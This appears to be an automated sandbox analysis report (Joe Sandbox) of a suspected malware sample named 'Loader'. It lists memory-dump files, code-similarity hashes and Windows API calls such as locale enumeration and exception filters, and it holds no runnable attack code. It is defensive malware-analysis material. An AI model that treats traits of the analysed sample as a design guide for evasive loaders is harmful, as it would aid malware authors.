                                                                                                  • Source File: 00000000.00000002.1666262395.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.1666244152.0000000000D30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1666288600.0000000000D56000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1666305542.0000000000D60000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1666321527.0000000000D61000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1666336222.0000000000D64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1666352497.0000000000D67000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_d30000_Loader.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: ErrorLast$InfoLocale
                                                                                                  • String ID:
                                                                                                  • API String ID: 3736152602-0
                                                                                                  • Opcode ID: 65ae06ca0b3bd322f75e0e969d1b5238b9ca66e176e4b591f4ce96a02abc06ee
                                                                                                  • Instruction ID: f6480661ab778559c7210745977f714bc6bcbfd29dfbaf210259a86563bdf9ed
                                                                                                  • Opcode Fuzzy Hash: 65ae06ca0b3bd322f75e0e969d1b5238b9ca66e176e4b591f4ce96a02abc06ee
                                                                                                  • Instruction Fuzzy Hash: 8B11C272611306ABDB14AF29DC56ABA77E8EF15320B14417AE906D7241EB78ED018B70
                                                                                                  APIs
                                                                                                    • Part of subcall function 00D4594A: GetLastError.KERNEL32(00000000,?,00D47CCD), ref: 00D4594E
                                                                                                    • Part of subcall function 00D4594A: SetLastError.KERNEL32(00000000,?,?,00000028,00D41F93), ref: 00D459F0
                                                                                                  • EnumSystemLocalesW.KERNEL32(00D4AD30,00000001,00000000,?,-00000050,?,00D4AB13,00000000,-00000002,00000000,?,00000055,?), ref: 00D4ACFA
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1666262395.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.1666244152.0000000000D30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1666288600.0000000000D56000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1666305542.0000000000D60000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1666321527.0000000000D61000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1666336222.0000000000D64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1666352497.0000000000D67000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_d30000_Loader.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: ErrorLast$EnumLocalesSystem
                                                                                                  • String ID:
                                                                                                  • API String ID: 2417226690-0
                                                                                                  • Opcode ID: 8751ed8ffaf42a2c1bbe29d99b7574940630af5d2d58e9fd987aaa8bb42503b8
                                                                                                  • Instruction ID: 1928d2861da8716b088381b29b010d18b2085ffd9e644d281804c5786e0f066b
                                                                                                  • Opcode Fuzzy Hash: 8751ed8ffaf42a2c1bbe29d99b7574940630af5d2d58e9fd987aaa8bb42503b8
                                                                                                  • Instruction Fuzzy Hash: 2611E93A6007015FDB189F39C8916BAB791FF80369B19442DE98687B40E771B942CB60
                                                                                                  APIs
                                                                                                    • Part of subcall function 00D4594A: GetLastError.KERNEL32(00000000,?,00D47CCD), ref: 00D4594E
                                                                                                    • Part of subcall function 00D4594A: SetLastError.KERNEL32(00000000,?,?,00000028,00D41F93), ref: 00D459F0
                                                                                                  • GetLocaleInfoW.KERNEL32(?,20000001,?,00000002,?,00000000,?,?,00D4AF4C,00000000,00000000,?), ref: 00D4B2E9
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1666262395.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.1666244152.0000000000D30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1666288600.0000000000D56000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1666305542.0000000000D60000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1666321527.0000000000D61000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1666336222.0000000000D64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1666352497.0000000000D67000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_d30000_Loader.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: ErrorLast$InfoLocale
                                                                                                  • String ID:
                                                                                                  • API String ID: 3736152602-0
                                                                                                  • Opcode ID: 9df831a63d0051c9c0a8434a04f2f6a6c1d07f876ff4fb950096463bc5fad4f4
                                                                                                  • Instruction ID: 01a96d9fee1a94dbefd609da19be60532a5fa90d57b70a02ce121a0bd41d72ad
                                                                                                  • Opcode Fuzzy Hash: 9df831a63d0051c9c0a8434a04f2f6a6c1d07f876ff4fb950096463bc5fad4f4
                                                                                                  • Instruction Fuzzy Hash: 2101FE36610112EBDB1C5F269C0A6FA7794EB50774F59442AEC46E3180DB30FE41C5B0
                                                                                                  APIs
                                                                                                    • Part of subcall function 00D4594A: GetLastError.KERNEL32(00000000,?,00D47CCD), ref: 00D4594E
                                                                                                    • Part of subcall function 00D4594A: SetLastError.KERNEL32(00000000,?,?,00000028,00D41F93), ref: 00D459F0
                                                                                                  • EnumSystemLocalesW.KERNEL32(00D4AFF0,00000001,?,?,-00000050,?,00D4AADB,-00000050,-00000002,00000000,?,00000055,?,-00000050,?,?), ref: 00D4AFCD
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1666262395.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.1666244152.0000000000D30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1666288600.0000000000D56000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1666305542.0000000000D60000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1666321527.0000000000D61000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1666336222.0000000000D64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1666352497.0000000000D67000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_d30000_Loader.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: ErrorLast$EnumLocalesSystem
                                                                                                  • String ID:
                                                                                                  • API String ID: 2417226690-0
                                                                                                  • Opcode ID: 1a2f2ae568c761bdaa3090879c6f3447a65a70d6730e6313f8c539c8e10b10a7
                                                                                                  • Instruction ID: 2c7c9ed2ab842c2d60b92bdc0784efddf2595fe35950317e8081e05edf7958aa
                                                                                                  • Opcode Fuzzy Hash: 1a2f2ae568c761bdaa3090879c6f3447a65a70d6730e6313f8c539c8e10b10a7
                                                                                                  • Instruction Fuzzy Hash: D9F0F6762003045FDB256F39D881A7A7BD5EF80368B19442DF9468B680D6719C46CA71
                                                                                                  APIs
                                                                                                    • Part of subcall function 00D41D11: EnterCriticalSection.KERNEL32(?,?,00D45DD8,?,00D5FC38,00000008,00D45CCA,00000000,00000000,?), ref: 00D41D20
                                                                                                  • EnumSystemLocalesW.KERNEL32(00D468F0,00000001,00D5FCB8,0000000C,00D462F1,-00000050), ref: 00D46935
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1666262395.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.1666244152.0000000000D30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1666288600.0000000000D56000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1666305542.0000000000D60000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1666321527.0000000000D61000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1666336222.0000000000D64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1666352497.0000000000D67000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_d30000_Loader.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: CriticalEnterEnumLocalesSectionSystem
                                                                                                  • String ID:
                                                                                                  • API String ID: 1272433827-0
                                                                                                  • Opcode ID: 643fcb8395777fcc4f6f8791f3481d00b4b1d2e60f087ea66d0ddac7aade440d
                                                                                                  • Instruction ID: a590a609e5af0b7504a735d9158b690faea747e8f90e0679773f056ffe661df2
                                                                                                  • Opcode Fuzzy Hash: 643fcb8395777fcc4f6f8791f3481d00b4b1d2e60f087ea66d0ddac7aade440d
                                                                                                  • Instruction Fuzzy Hash: 0AF0C976A003049FD704DFA8E842B9977A0EB49721F10412AE911DB3A1C7B599448F75
                                                                                                  APIs
                                                                                                    • Part of subcall function 00D4594A: GetLastError.KERNEL32(00000000,?,00D47CCD), ref: 00D4594E
                                                                                                    • Part of subcall function 00D4594A: SetLastError.KERNEL32(00000000,?,?,00000028,00D41F93), ref: 00D459F0
                                                                                                  • EnumSystemLocalesW.KERNEL32(00D4B110,00000001,?,?,?,00D4AB35,-00000050,-00000002,00000000,?,00000055,?,-00000050,?,?,?), ref: 00D4B0FC
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1666262395.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.1666244152.0000000000D30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1666288600.0000000000D56000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1666305542.0000000000D60000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1666321527.0000000000D61000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1666336222.0000000000D64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1666352497.0000000000D67000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_d30000_Loader.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: ErrorLast$EnumLocalesSystem
                                                                                                  • String ID:
                                                                                                  • API String ID: 2417226690-0
                                                                                                  • Opcode ID: bd11726e43fec86c8a9b7399cc1b7460c01bc0166fd5fc1c576f1d0b3f48c6b1
                                                                                                  • Instruction ID: 4e23b6af8506301bf5dec00c9888ab3dce8ceb8390f1eb7f7a34a99ca0fdab46
                                                                                                  • Opcode Fuzzy Hash: bd11726e43fec86c8a9b7399cc1b7460c01bc0166fd5fc1c576f1d0b3f48c6b1
                                                                                                  • Instruction Fuzzy Hash: 8DF0E53630034957CB04AF35DC5566B7F94EFC2731B0A405AEA098B691C775D946CBB0
                                                                                                  APIs
                                                                                                  • GetLocaleInfoW.KERNEL32(00000000,?,00000000,?,-00000050,?,00000000,?,00D40A63,?,20001004,00000000,00000002,?,?,00D3F971), ref: 00D46429
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1666262395.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.1666244152.0000000000D30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1666288600.0000000000D56000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1666305542.0000000000D60000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1666321527.0000000000D61000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1666336222.0000000000D64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1666352497.0000000000D67000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_d30000_Loader.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: InfoLocale
                                                                                                  • String ID:
                                                                                                  • API String ID: 2299586839-0
                                                                                                  • Opcode ID: d2b6762c4c72b0a555b2713594ffb3338a3b9f58b78396d1fb1ad746a9defefa
                                                                                                  • Instruction ID: 9cc61d3d33f5e76edd30ac2f4ce282d4e15df69c918449d3c117518e24ec508d
                                                                                                  • Opcode Fuzzy Hash: d2b6762c4c72b0a555b2713594ffb3338a3b9f58b78396d1fb1ad746a9defefa
                                                                                                  • Instruction Fuzzy Hash: AEE04F31500218BBCF162F61DC05EAE7F16EF457A1F048020FD0666221CB31CA20AAF2
                                                                                                  APIs
                                                                                                  • SetUnhandledExceptionFilter.KERNEL32(Function_00009B90), ref: 00D39A6C
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1666262395.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.1666244152.0000000000D30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1666288600.0000000000D56000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1666305542.0000000000D60000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1666321527.0000000000D61000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1666336222.0000000000D64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1666352497.0000000000D67000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_d30000_Loader.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: ExceptionFilterUnhandled
                                                                                                  • String ID:
                                                                                                  • API String ID: 3192549508-0
                                                                                                  • Opcode ID: 35590bcc68b31ae5267bcd5680c9309f2bc915bc83535afc6613f901f602b159
                                                                                                  • Instruction ID: cadde423ef125eae002bca6359cb76766bdc8434228cda4e5f9dda8945995976
                                                                                                  • Opcode Fuzzy Hash: 35590bcc68b31ae5267bcd5680c9309f2bc915bc83535afc6613f901f602b159
                                                                                                  • Instruction Fuzzy Hash:
                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1666262395.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.1666244152.0000000000D30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1666288600.0000000000D56000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1666305542.0000000000D60000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1666321527.0000000000D61000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1666336222.0000000000D64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1666352497.0000000000D67000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_d30000_Loader.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: HeapProcess
                                                                                                  • String ID:
                                                                                                  • API String ID: 54951025-0
                                                                                                  • Opcode ID: e33dfcd8ea3040554d948de8962e085a3e380efa3e694121439f7eb624361c57
                                                                                                  • Instruction ID: fc96dd8bf5e1581602b54b98d36a307b2c52b9d753dd4f444906f671e80288f0
                                                                                                  • Opcode Fuzzy Hash: e33dfcd8ea3040554d948de8962e085a3e380efa3e694121439f7eb624361c57
                                                                                                  • Instruction Fuzzy Hash: 7CA012341003018F53004F315904A083BD499411813084095D404C4220D76040406F20
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1666262395.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.1666244152.0000000000D30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1666288600.0000000000D56000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1666305542.0000000000D60000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1666321527.0000000000D61000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1666336222.0000000000D64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1666352497.0000000000D67000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_d30000_Loader.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: ca763dd9b553fac3fe5c042bb02132b10217fc68e25bae804101696c222b910a
                                                                                                  • Instruction ID: 96d22183dc9e480340878181ed4cf5435dacf7fb70142563a37e94e0c1fa98c6
                                                                                                  • Opcode Fuzzy Hash: ca763dd9b553fac3fe5c042bb02132b10217fc68e25bae804101696c222b910a
                                                                                                  • Instruction Fuzzy Hash: 5CD0923A641A58AFC210CF49E440D41F7B8FB8E770B154166EA48D3B20C771FC11CAE0
                                                                                                  APIs
                                                                                                  • GetCPInfo.KERNEL32(005D05A8,005D05A8,00000000,7FFFFFFF,?,00D541BD,005D05A8,005D05A8,00000000,005D05A8,?,?,?,?,005D05A8,00000000), ref: 00D54278
                                                                                                  • __alloca_probe_16.LIBCMT ref: 00D54333
                                                                                                  • __alloca_probe_16.LIBCMT ref: 00D543C2
                                                                                                  • __freea.LIBCMT ref: 00D5440D
                                                                                                  • __freea.LIBCMT ref: 00D54413
                                                                                                  • __freea.LIBCMT ref: 00D54449
                                                                                                  • __freea.LIBCMT ref: 00D5444F
                                                                                                  • __freea.LIBCMT ref: 00D5445F
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1666262395.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.1666244152.0000000000D30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1666288600.0000000000D56000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1666305542.0000000000D60000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1666321527.0000000000D61000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1666336222.0000000000D64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1666352497.0000000000D67000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_d30000_Loader.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: __freea$__alloca_probe_16$Info
                                                                                                  • String ID:
                                                                                                  • API String ID: 127012223-0
                                                                                                  • Opcode ID: d12911e7b6b62be68f40aa7b57fe053cb10609d77908521380ee00cc30ebdd87
                                                                                                  • Instruction ID: 15fad44837684110af583bd7997a4025f4bfbafedad3228c435e9b08788fcfd7
                                                                                                  • Opcode Fuzzy Hash: d12911e7b6b62be68f40aa7b57fe053cb10609d77908521380ee00cc30ebdd87
                                                                                                  • Instruction Fuzzy Hash: D1710432940215ABDF209F94CC42BAE7BB9EF4531AF280055FC14B7281D7B5DC888776
                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1666262395.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.1666244152.0000000000D30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1666288600.0000000000D56000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1666305542.0000000000D60000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1666321527.0000000000D61000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1666336222.0000000000D64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1666352497.0000000000D67000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_d30000_Loader.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: _strrchr
                                                                                                  • String ID:
                                                                                                  • API String ID: 3213747228-0
                                                                                                  • Opcode ID: b258c23f8f5adf4b5b829db56bad2fb8a7efe0f2db3ca2ba46b92337591bc9f9
                                                                                                  • Instruction ID: 497d89c6443eeaffc1686b007b2b10de8b68db27d4be154b6bcbdbf5d3660270
                                                                                                  • Opcode Fuzzy Hash: b258c23f8f5adf4b5b829db56bad2fb8a7efe0f2db3ca2ba46b92337591bc9f9
                                                                                                  • Instruction Fuzzy Hash: 86B14872D00395AFDB11CF28CC91BAEBBA5EF55390F284165E944AB282DB74D901DBB0
                                                                                                  APIs
                                                                                                  • _ValidateLocalCookies.LIBCMT ref: 00D3ABE7
                                                                                                  • ___except_validate_context_record.LIBVCRUNTIME ref: 00D3ABEF
                                                                                                  • _ValidateLocalCookies.LIBCMT ref: 00D3AC78
                                                                                                  • __IsNonwritableInCurrentImage.LIBCMT ref: 00D3ACA3
                                                                                                  • _ValidateLocalCookies.LIBCMT ref: 00D3ACF8
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1666262395.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.1666244152.0000000000D30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1666288600.0000000000D56000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1666305542.0000000000D60000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1666321527.0000000000D61000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1666336222.0000000000D64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1666352497.0000000000D67000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_d30000_Loader.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                                                                  • String ID: csm
                                                                                                  • API String ID: 1170836740-1018135373
                                                                                                  • Opcode ID: a571cd8ac4076e4986b1c1358d13404b066a899ff4594213489be66db604a694
                                                                                                  • Instruction ID: 04a725aeb7ad087668dc9e3e3abc5b502a497555bf7b0e95f1626cddb5f08e7e
                                                                                                  • Opcode Fuzzy Hash: a571cd8ac4076e4986b1c1358d13404b066a899ff4594213489be66db604a694
                                                                                                  • Instruction Fuzzy Hash: 9041AF38A00218AFCF10DF6CD885A9EBBA5EF45324F188155E8599B352D731EE05CBB2
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1666262395.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.1666244152.0000000000D30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1666288600.0000000000D56000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1666305542.0000000000D60000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1666321527.0000000000D61000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1666336222.0000000000D64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1666352497.0000000000D67000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_d30000_Loader.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 0a45a65005d91d46578a71273f6f2de7b69185a2a68bee1e93ba96ef642fb931
                                                                                                  • Instruction ID: e89031d6cab983fc1354dca7e7acf0676c57ee8662a3915dec6c72abab4e2e37
                                                                                                  • Opcode Fuzzy Hash: 0a45a65005d91d46578a71273f6f2de7b69185a2a68bee1e93ba96ef642fb931
                                                                                                  • Instruction Fuzzy Hash: E0B1DF70A04749AFDF15DFA8D841BAEBBB1EF46391F184148EC0597392C7709A49CB70
                                                                                                  APIs
                                                                                                  • GetLastError.KERNEL32(?,?,00D44464,00D3A97D,00D39BD4), ref: 00D4447B
                                                                                                  • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00D44489
                                                                                                  • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00D444A2
                                                                                                  • SetLastError.KERNEL32(00000000,00D44464,00D3A97D,00D39BD4), ref: 00D444F4
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1666262395.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.1666244152.0000000000D30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1666288600.0000000000D56000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1666305542.0000000000D60000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1666321527.0000000000D61000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1666336222.0000000000D64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1666352497.0000000000D67000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_d30000_Loader.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: ErrorLastValue___vcrt_
                                                                                                  • String ID:
                                                                                                  • API String ID: 3852720340-0
                                                                                                  • Opcode ID: b426d3f8c851dfca2d2487e0e4e661efe999d98e02d4bf2b5e5b4c9654f88c8e
                                                                                                  • Instruction ID: 2a2c44b47891669cfed7256225866c803f4f4f17fc0810a20fed78d418c190dc
                                                                                                  • Opcode Fuzzy Hash: b426d3f8c851dfca2d2487e0e4e661efe999d98e02d4bf2b5e5b4c9654f88c8e
                                                                                                  • Instruction Fuzzy Hash: 5E01843211A7115FF7243BB4BC85B672B89EB41775B29023AF914952F2EFD14C829670
                                                                                                  APIs
                                                                                                  • type_info::operator==.LIBVCRUNTIME ref: 00D44E6B
                                                                                                  • CallUnexpected.LIBVCRUNTIME ref: 00D450E4
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1666262395.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.1666244152.0000000000D30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1666288600.0000000000D56000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1666305542.0000000000D60000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1666321527.0000000000D61000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1666336222.0000000000D64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1666352497.0000000000D67000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_d30000_Loader.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: CallUnexpectedtype_info::operator==
                                                                                                  • String ID: csm$csm$csm
